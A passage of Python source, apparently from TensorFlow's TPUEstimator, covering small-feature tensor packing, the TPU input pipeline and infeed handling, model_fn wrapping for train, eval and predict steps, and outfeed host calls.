# We do not handle nested inputs here.
if not isinstance(tensor, tf.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
tf.compat.v1.logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated'
'small features.')
features[key] = (tf.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = tf.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two senarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
host_device_ids = set()
for replica_id in xrange(self._ctx.num_replicas):
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_device_ids.add(host_id)
for host_id in host_device_ids:
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if tf.compat.v1.get_default_graph().get_collection(tf.compat.v1.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = tf.nest.flatten(computation_inputs)
@tf.nondifferentiable_batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = tf.nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx, outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(tf.compat.v1.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients,
tf.compat.v1.train.get_global_step())
]
# We must run train_op to update the variables prior to running the
# outfeed.
with tf.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update({
'host_call': (lambda loss_t: loss_t,
[tf.reshape(loss, [1])])
})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with tf.control_dependencies(host_call_outfeed_ops):
return tf.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return tf.math.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with tf.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, tf.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`. As we are running on the CPU, escape
# the TPUInferenceContext.
graph_context = tf.compat.v1.get_default_graph()._get_control_flow_context()
try:
if isinstance(graph_context, tpu._TPUInferenceContext):
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context.outer_context)
return estimator_spec.as_estimator_spec()
finally:
tf.compat.v1.get_default_graph()._set_control_flow_context(
graph_context)
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
tf.compat.v1.logging.warn('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx, outfeed_every_n_steps=1):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with tf.compat.v1.device(tf.compat.v1.tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [tf.compat.v1.cond(
tf.math.equal(tf.math.floormod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: tf.no_op())]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
